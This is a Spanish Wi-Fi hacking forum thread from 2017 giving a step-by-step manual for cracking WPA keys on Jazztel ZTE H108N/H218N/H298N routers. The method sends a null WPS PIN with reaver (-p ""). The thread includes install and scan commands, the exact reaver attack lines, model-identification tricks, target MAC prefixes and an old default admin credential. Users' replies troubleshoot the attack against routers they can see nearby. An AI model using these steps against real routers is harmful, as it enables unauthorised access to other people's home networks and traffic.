Todo sobre la brecha "PIN NULL" contra PA ZTE de Jazztel

kcdtv · 08-07-2017 00:41:16

Explicaciones y manual "paso a paso" para crackear los ZTE H108N, ZTE H218N y ZTE H298N de Jazztel en dos segundos

Vídeo de demostración

vídeo previamente publicado aquï: 0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

Routers afectados en España

Jazztel ha exclusivamente empleado estos modelos durante años después elegir ZTE como proveedor de hardware en lugar de Comtrend y Technicolor
Diría que los primeros PA de este tipo han aparecido por mi barrio en 2012-2013
Se distinguen fácilmente de los Comtrend porque su eSSID por defecto gasta 4 dígitos ascii (JAZTELL_XXXX) mientras que los Comtrend o Technicolor tienen 4 o 6 caracteres hexadecimales.

Al contrario; los routers ZTE F660 y ZTE F680 no son vulnerables.
El ZTE F680 tiene soporte "ac": Son menos comunes que los modelos vulnerables.
Si tu adaptador wifi es de doble banda los distingues enseguida porque emiten dos redes
El eSSID de la red ac es el mismo que el eSSID de la red b/g/n añadiendo "_5G" al final
JAZZTEL_XXXX en frecuencias de 2.4 GHz y JAZZTEL_XXXX_5G en frecuencias de 5GHz
Si es un FTE 660 o si tu WiFi es unicamente b/g/n se pueden distinguir mirando los paquetes PROBE,
Veremos cómo en el manual, es muy fácil. wink

Antigua vulnerabilidad

En sus inicios estos tres modelos venían con el PIN 12345670 activado por defecto
Es la peor configuración posible ya que reaver las crackeaba con un solo intento: 12345670 es el PIN que manda reaver primero.
Captura del 2014:

Tenían además una puerta trasera ya que los técnicos de Jazztel solían "olvidarse" una cuenta con derechos de administrador pam
user: avanzado
pass: avanzado
Eran probablemente los PA los más inseguros en 2014-2015. big_smile

La cosa cambió en 2015: Jazztel actualizó todos los firmwares y el PIN 12345670 no estaba habilitado. (Y la cuenta avanzado:avanzado fue deshabilitada)
Un ataque brute force no daba resultado, no conseguíamos comprobar un solo PIN...
Lo mismo que hoy en día.
Si intentas hacer un ataque de fuerza bruta no llegarás a ninguna parte:

El router manda un M5 (primera mitad supuestamente acertada) cuál sea el PIN que mandes
Y podrías probar todos los PIN posibles y siempre tendrás un M5 pero nunca tendrás el M7-M8 => llave WPA.
¿Por qué? Sigas leyendo... wink

Brecha "PIN NULL" (sin valor atribuido)

Hemos hablado aquí de esta idea hace meses atrás: Crack WPS mandando un PIN "en blanco" (null)
Recuerdo que para tener el WPS en modo PIN correctamente configurado un fabricante debe (en teoría):

Habilitar el WPS
Configurar un PIN que cumple con la regla checksum

Es lo que estipula la wifi-aliance en su especificación del WPS
En la practica hemos visto que todo es posible y que los fabricantes se saltan las reglas.
Por ejemplo los routers pueden tener un PIN por defecto "no conforme".
Es decir un PIN que no respectan la regla Checksum (el Amper WLAN_XXXX por ejemplo)

En este caso la configuración WPS se ha hecho así:

BusyBox vv1.9.1 (2014-02-08 20:26:13 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# nvram show  | grep wps_device_pin  
size: 2659 bytes (30109 left)
wps_device_pin=
#

Tenemos a una variable wps_device_pin que está declarada.
El valor atribuido es ... nada. Es decir NULL (nulo)

El WPS está habilitado sin PIN definido: Una configuración que sale del guión de la Wifi-Alliance.
Para recuperar la llave en estos casos se debe mandar un PIN en blanco.
Cosa que podéis hacer con reaver desde la versión 1.6.b. con la opción -p mejorada.( "-p with arbitrary string")

	-p, --pin=<wps pin>             Use the specified pin (may be arbitrary string or 4/8 digit WPS pin

La opción permite mandar la cadena que sea en lugar de un PIN WPS conforme (8 dígitos y el ultimo es una suma de comprobación de los siete anteriores)
se hace con

-p ""

o

-p ''

* Podemos mandar un PIN que no cumple la regla del checksum para estos routers que no cumplen la regla
* Podemos mandar un PIN en blanco para crackear los puntos de acceso que tienen su PIN definido sin valor
* Podemos mandar "¡Quiero la llave WPA!".... Desgraciadamente no suele dar resultados, ni siquiera con un "Por favor" big_smile
Puede ser lo que queréis.
De paso doy las gracias a binnarymaster para proponer y codificar esta mejora de la opción -p "con cadenas arbitrarias" . (ver Add arbitrary string PIN feature )
Notad que el fantástico Wireless Air Cut para Windows amigo de nuestro amigo Patcher es también capaz de mandar un PIN en blanco y aprovechar esta brecha.

Manual paso a paso
"Crack ZTE Jazztel con PIN nulo"

* Por lo que es de hacerlo desde Windows con waircut les invito a consultar el hilo dedicado: Wireless Air Cut, auditoria del protocolo wps en Windows

1) Instalar reaver 1.6.1 (o una versión superior)

Lo hago desde Kali pero los pasos valen para cualquier distribución basada en debian.

Instalar la dependencia:
```
sudo apt install libcap-dev aircrack-ng
```
Si no está hecho ya instalas git:
```
sudo apt install git
```

Descargas la rama GitHub

git clone https://github.com/t6x/reaver-wps-fork-t6x.git

Situarse en el directorio que se acaba de crear para alojar el código fuente
```
cd /reaver-wps-fork-t6x*/src/
```
Compilar
```
./configure && make
```
Instalar
```
sudo make install
```

Sí tienes reaver ya instalado no pasa nada: Instalando reaver 1.6.1 lo "actualizarás"

Escaneando en búsqueda de objetivo

Activar el modo monitor con airmon-ng

sudo airmon-ng wlan0

Escanear con airodump-ng empleando los parámetros --wps et --manufacturer
Obviamente el parámetro --wps es importante para escanear el WPS. big_smile
El parámetro --manufacturer nos viene de perla porque vemos al instante si los PA son ZTE.

sudo airodump-ng wlan0mon --manufacturer --wps

Crack instantáneo

Una vez que aparece el objetivo parramos el escaneo con ctrl+c
Copiamos el bSSID para pegarlo en nuestra linea de orden reaver

sudo reaver -i wlan0mon -b <bSSID> -vv -p ""

Si no estamos en buenas condiciones es recomendable fijar el canal para que reaver lo detecte el objetivo y aumentar levemente el tiempo de time out para que reaver espere un poco más la respuesta del router

sudo reaver -i wlan0mon -b <bSSID> -c <nºcanal> -t 8 -T 8 -vv -p ""

¿Qué hacer si no me sale?

Insistir.
Veis en el vídeo que el ataque puede requerir varios intentos.
A estas alturas tenemos claro que vale solo para los Jaztell ZTE.
El problema es que con el escaneo airodump-ng no podemos saber si estamos en presencia de un modelo soportado (H108N, H218N o H298N) o de un modelo no soportado (F660 y F680)
Para distinguirlos:

Si llegamos más lejo que el M2 es que está a priori vulnerable.
Con un ataque sobre F660 y F680 nunca obtenemos el M3:
Para tener lo más claro que el agua,
1. Pasamos en modo managed
```
airmon-ng stop wlan0mon
```
2. Obtenemos la información emitida en los PROBE.
  Para ello solo tenemos que copiar el bSSID del dispositivo que nos tiene intrigado en la linea que sigue:
```
iw wlan1 scan | grep -E "bSSID|Model Number" | grep -A 1 "BSSID"
```
  Veremos en un instante si es un F660 o un F680 y por lo tanto si no es vulnerable:

Si llevas un tiempo machacando el router y que no obtienes nada aunque sea vulnerable, deja lo reposar un rato y vuelve a intentarlo.
"Lo bueno" es que no se bloquea.

Jazztel se despide de la escena wifi ibérica saliendo por la puerta grande, dejando a cienes de miles de routers hackeables en unos segundos.
Si tienes un NH198N, un ZH218N o un ZH298N poco puedes hacer para impedir el crack.
La interfaz web está capada y desconozco la contraseña de Jazztel (no la dan) para abrir una sesión telnet con derechos de administrador.
Sería la única forma que se me ocurre para poder deshabilitar del todo el WPS en modo PIN.
La vulnerabilidad se podría explotar en otros routers,
Específicamente contra los modelos que mandan sistemáticamente un M5 (pimera mitad supuestamente acertada) cuando probamos el PIN que sea.
Este comportamiento errático y ilógico indica que un PIN nulo está configurado.

spainderman · 08-07-2017 13:35:36

Hola.

Suelo ser un espectador asiduo que finalmente me inscribí.

Tegno dos vicisitudes por las que se verá que solo soy un usuario aficionado, una es por el estupendo programa Waircut, he probado ponerle "" y aunque no me dió nada funcionó.
La segunda es acerca si en el wifislax se puede usar el reaver 1.6 o he de usar Kali o Debian.

Gracias por todo.

Ultima edición por spainderman (08-07-2017 16:41:20)

kcdtv · 08-07-2017 15:47:12

sólo soy usuario..

Yo también. smile

una es por el estupendo programa Waircut, he probado ponerle "" y aunque no me dió nada funcionó.

Patcher te dirá algo pero tampoco el asunto es muy complicado.
waircut hace lo mismo que reaver 1.6.1, y es capaz de mandar un PIN vació.
No hay dudas sobre ello.
Ahora si no te ha funcionado para recuperar la lave en un caso concreto puede ser por las razones evocadas más arriba
La primera cosa en caso de dudas es bien identificar el modelo

iw <interface> scan | grep -E "bSSID|Model Number" | grep -A 1 "BSSID"

Y por supuesto lo de estar en buenas condiciones para mandar el PIN y procesare la respuesta.
No ayuda si hay clientes conectados.

Sobre tu segunda vicisitud big_smile ;
Los comandos dados valen para todos los Sistema Operativos basados en Linux excepto
1) la instalación de las dependencias

sudo apt install libcap-dev aircrack-ng

.
2) la instalación de git

sudo apt install git

Puedes ver que se usa el comando "apt" para instalar los programas.
Este comando es especifico a las distribuciones basadas en debian (Kali Linux, Ubuntu etc.. etc.. )
En tu caso no te hace falta instalar aircrrack-ng o libcap-dev: Tu sistema lleva reaver (y aircrack-ng); las dependencias están cumplidas. wink

No es mala idea documentarse un poco rápidito sobre los comandos que lees, para aprender. smile
Por ejemplo lo de compilar y instalar con

cd /ruta/carpeta/contenedora>/

./configure

make

(sudo) make install

Es lo más universal que hay y te valdrá para todos los sistemas linux-UNIX que quieres; desde openWRT hasta los servidores de la NSA.
Te cunde buscar un articulo (hay miles) sobre "compilar y instalar con make" y echarle un ojo.
Bienvenido al foro smile

spainderman · 08-07-2017 16:38:25

Muchas gracias kcdtv, había eliminado mis preguntas pues pensaba que lo propio era que me buscase yo mismo esas respuestas.

No me esperaba el tiempo que le has dedicado.

Las que tengo a la vista son dos 44:F4:36, una con el bssid explicado, JAZZTEL_XXXX y la otra modificado. No tienen 5G.

Yo en casa veo mas canales wifi que de tv, me obligan a ello y no recibo nada por ello.

Probaré lo que me indicas. Hasta otra.

Ultima edición por spainderman (08-07-2017 16:43:26)

kcdtv · 08-07-2017 16:58:23

abía eliminado mis preguntas pues pensaba que lo propio era que me buscase yo mismo esas respuestas.

No hacía falta. smile

Para volver a tu caso:
El inicio de bSSID que pones confirma que es un "ZTE Jazztel"

[email protected]:~$ cat /var/lib/ieee-data/oui.txt | grep 44F436
44F436     (base 16)		zte corporation
[email protected]:~$

Hace falta mirrar en los PROBES entonces...
Si lo haces con waircut tienes la información WPS PROBE en el cuadro superior de la derecha
Y con linux la linea de comando iw scan con pipe
A veces hay que hacer lo varias veces para poder ver la información.

o en casa veo mas canales wifi que de tv, me obligan a ello y no recibo nada por ello.

Me gustaría tener los mismos derechos que en Estados Unidos y poder disparar a todas estas ondas cuando pisan mi propriedad big_smile

spainderman · 08-07-2017 18:43:48

Ya lo he comprobado, F 660. El caso es que no emiten en 5G, sólo tienen una señal.

Me queda instalar el reaver cosa que iré haciendo, yo el w95 me lo acabé cuando tenía 24 y ahora ya que casi los doblo y se nota...

Estupendo foro, es lo mínimo que se puede decir.
Saludos.

Me gustaría tener los mismos derechos que en Estados Unidos y poder disparar a todas estas ondas cuando pisan mi propriedad

Pues sí, allí, puedes ir armado si llevas el arma a la vista, creo que en NY no existe esa ley.
Si pones en VOSE un western de Hollywood de hasta los ´60 +/- probablemente oigas hablar a los indios en su segunda lengua natal, el español.
Ciudad Galvez es Galveztown
En fin, sólo era un apunte.

Ultima edición por spainderman (08-07-2017 19:01:37)

kcdtv · 08-07-2017 19:08:32

El caso es que no emiten en 5G, sólo tienen una seña

Upss.... Tienes toda la razón del mundo: No es de doble banda. big_smile
¿Pero entonces escupe el modelo en los PROBE verdad?
¿Si haces el escaneo con iw te devuelve el modelo.?
Deduzco que sí pero para estar seguro...

Pues sí, allí, puedes ir armado si llevas el arma a la vista, creo que en NY no existe esa ley.

Sí, lo que decía era caricatural... En colorado puedes llevar porros en la calle, en Texas son armas... La cosa cambia mucho de un estado a otro. big_smile

spainderman · 08-07-2017 23:11:07

¿Si haces el escaneo con iw te devuelve el modelo.?
Deduzco que sí pero para estar seguro...

iw me responde

SSID JAZZTEL_XXXX
ZTE F660

Patcher · 09-07-2017 07:41:18

spainderman escribió:

Hola.
Suelo ser un espectador asiduo que finalmente me inscribí.
Tegno dos vicisitudes por las que se verá que solo soy un usuario aficionado, una es por el estupendo programa Waircut, he probado ponerle "" y aunque no me dió nada funcionó.
La segunda es acerca si en el wifislax se puede usar el reaver 1.6 o he de usar Kali o Debian.
Gracias por todo.

Para enviar un pin vacío con waircut no has de poner "" o '', ni siquiera un espacio, debes dejar la casilla vacía, no escribas nada en ella o borra su contenido si lo tuviera. Eso es todo.

kcdtv · 09-07-2017 08:14:22

@ spainderman
Visto. wink
Gracias por confirmarlo, he corregido el primer post.
@ LDASTING
Se ve que MásMóvil usa el ZTE H208N, otro modelo ZTE pero muy parecido al H108N y el H298N..., podría ser.
Se ve que usan también otro modelo de doble banda y no sé lo que es.

LDASTING · 09-07-2017 09:33:18

El de doble banda es f680 de Jazztel

pastilla · 11-07-2017 03:30:45

¡Hola! Gracias por vuestro trabajo, me estaba saliendo humo porque veia que con el modelo de router correcto no acababa de dar la clave se quedaba colgado en el M6 pasando al M5 de nuevo y asi sucesivamente, despues trasteando con el tiempo y de nuevo sin solucion, perooo al final he visto cual era el problema y era la opcion del pin fantasma el cual se puede añadir de dos formas con: -p "" o -p '' , pues bien utilizando wifislax 4.12 y con el ultimo reaver disponible el 1.6.1, la opcion -p "" (la de las comillas dobles) no conseguia acabar el proceso, en el momento que la he cambiado por la opcion -p '' (la de las comillas simples) lo ha terminado al instante y en el primer intento..

Creo que lo mejor seria solo poner una opcion para que no pase esto.

Un saludo y gracias

Ultima edición por pastilla (11-07-2017 11:12:38)

kcdtv · 11-07-2017 13:50:36

la opcion del pin fantasma

lol Entonces llama a los cazafantasmas. tongue
No existe ninguno PIN fantasma es un PIN con valor "nulo" (PIN NULL). Se dice en el titulo y está explicado.
Es mejor llamar las cosas por su nombre en lugar de usar las metáforas estúpidas que te encuentras en los (peores) vídeos de youtube wink

la opcion -p "" (la de las comillas dobles) no conseguia acabar el proceso, en el momento que la he cambiado por la opcion -p '' (la de las comillas simples) lo ha terminado al instante y en el primer intento..

Simples o dobles comillas hacen exactamente lo mismo ya que son separadores para poder delimitar el fin y el inicio de un valor

No has entendido la opción; hay una sola opción -p.
No está pensada unicamente para mandar un PIN sin valor definido, está pensada para mandar el valor que quieres. wink

d1k0w0ns · 03-10-2017 10:28:42

la opcion -j del nuevo wash y grep dice el modelo "rapidamente"

wash -i mon0 -j | grep JAZZTEL

el modelo exacto lo pone en la parte "wps_device_name" y en algunos tambien es la parte "wps_model_name"
del F680 parece que hay 2 versiones, "wps_device_name" : "ZXHN F680 V2.0"
y despues de un rato todos los F680 que veo que son bastantes son V2.0
y despues de una hora o todos F660 o F680 en fin.

aqui decias que en los probes salian 2 modelos distintos
https://www.wifi-libre.com/topic-824-0- … html#p6467
puede ser que una compañia use user-agents? alguna lo hace?

segun wash la 44:F4:36 es un F660 como se decia que daba iw un poco mas arriba.

kcdtv ahora todas tus cosas las haces con kali only no?

que tal los gatos?

te pregunto cosas para que no te aburras xD

kcdtv · 04-10-2017 15:47:58

Para ver los routers (antiguamente) vulnerables es más seguro así

wash -i <inetrfaz> -j | grep -E 'ZXHN H108N|ZXHN H218N'

Los detectarás incluso si se ha cambiado su eSSID por defecto
Notarás el uso de -E con grep y es para poder interpretar varias expresiones regulares a la vez.
Sino los de la serie F6XX nunca han sido vulnerables.

puede ser que una compañia use user-agents? alguna lo hace?

No veo cúal podría ser la relación con los parámetros extendidos WPS de las respuestas probe.
Estos se configuran en el firmware, Te habrás probablemente dado cuenta que cada uno hace un poco lo que sale de los huevos a la hora de rellenar los campos big_smile

kcdtv ahora todas tus cosas las haces con kali only no?

No.
Uso Kali cuando atiendo el foro pero tengo en un "trialboot" y tengo otras computadoras que ni tienen kali.
Solo me falta instalar la nueva "red star" de los coreanos del norte. Espero que venga con cromos de kin jong ill 2 big_smile

d1k0w0ns · 05-10-2017 04:34:35

kcdtv escribió:

Para ver los routers (antiguamente) vulnerables es más seguro así
wash -i <inetrfaz> -j | grep -E 'ZXHN H108N|ZXHN H218N'

si asi detecta los 108 y los 218 para que le pones el -j ??

kcdtv escribió:

Los detectarás incluso si se ha cambiado su eSSID por defecto

asi tambien poniendo el principio de mac donde las x, lo que se llama buscar por mac que ahora tambien se puede hacer con wash, antes no

airodump-ng -d XX:XX:XX:00:00:00 -m FF:FF:FF:00:00:00 mon0 --wps

con wash de otra manera claro

kcdtv escribió:

Notarás el uso de -E con grep y es para poder interpretar varias expresiones regulares a la vez.

wai a ver si va mas rapido

kcdtv escribió:

Sino los de la serie F6XX nunca han sido vulnerables

yap

kcdtv escribió:

Te habrás probablemente dado cuenta que cada uno hace un poco lo que sale de los huevos a la hora de rellenar los campos

por eso mismo algunos son datos absurdos,
desde que sony metia rootkits me lo creo todo.

mas me referia con la que haces los experimentos que te funcionan todos, a mi con la mia me funcionan la mitad, kali supongo, me tengo que bajar una weekend de esas xD

con la red star llevas años, aprende koreano joder que no cuesta tanto xD

Ultima edición por d1k0w0ns (05-10-2017 04:40:42)

kcdtv · 05-10-2017 09:39:01

si asi detecta los 108 y los 218 para que le pones el -j ??

Sin el j no se sabe el modelo: Está en las respuestas probe,

d1k0w0ns · 06-10-2017 13:49:58

me imaginaba que seria eso pero asi va demasiado lento prefiero buscar por mac sabiendo cual es claro.

kcdtv · 06-10-2017 15:23:53

Tenemos a una lista de bssid conocidos visto que son aquellos routers que tenían hasta 2014 el PIN 12345670 habilitado por defecto:

ZXHN_H108N + ZXHN H218N + ZXHN H298N   |   ZTE   |       JAZZTEL_XXXX
F8:03:8E   F8:1B:FA   F8:27:C5   F8:E1:CF  F8:ED:80   F8:7F:35   20:89:86    20:89:86   54:22:F8   A0:EC:80   F0:84:C9

A lo mejor faltan unos inicios de bssid porque nadie ha mandado mas datos cuando configuraron el PIN con una variable NULL.

d1k0w0ns · 06-10-2017 17:51:51

kcdtv escribió:

Jazztel se despide de la escena wifi ibérica saliendo por la puerta grande, dejando a cienes de miles de routers hackeables en unos segundos.
.

a donde se van?

pero esos del 2014 seran la brecha del 12345670,
los de esta que yo sepa son los 2C:95:7F pero le han anulado el wps asi que no se han ido muy lejos si siguen fixeando smile

kcdtv · 06-10-2017 18:33:00

a donde se van?

Jaztell es ahora propriedad de Orange y ahora los clientes de jazztell reciben "livebox fibra" de Orange cuando se les instala el router.
Han efectivamente deshabilitado progresivamente el WPS en gran parte de los PA vulnerables pero no en todos:

A estas alturas los que no tienen el WPS deshabilitado no lo tendrán.

Tema	Respuestas	Vistas	Ultimo mensaje
Revolución en el crack WPA: Ataque por diccionario contra PMKID por kcdtv [ 1 2 3 ]	65	3469	Hoy 19:42:44 por skan
Demostración ataque PMKID - Explicado paso a paso por Xavi [ 1 2 3 ]	60	1541	Hoy 19:03:45 por Xavi
hashcat falla desde v 4.0.1: falta hashcat.pid y hahscat.outfiles por bala	17	525	Hoy 16:36:48 por bala
Colabora con datos a la investigación sobre nuevos ataques en pixiewps por kcdtv [ 1 2 ]	26	2465	Hoy 12:35:30 por troh
Pegado: Pegado:: crack-keys por crash [ 1 2 3 4 5 ]	121	6418	Ayer 09:54:05 por crash

Foro Wifi-libre.com

Anuncio

#1 08-07-2017 00:41:16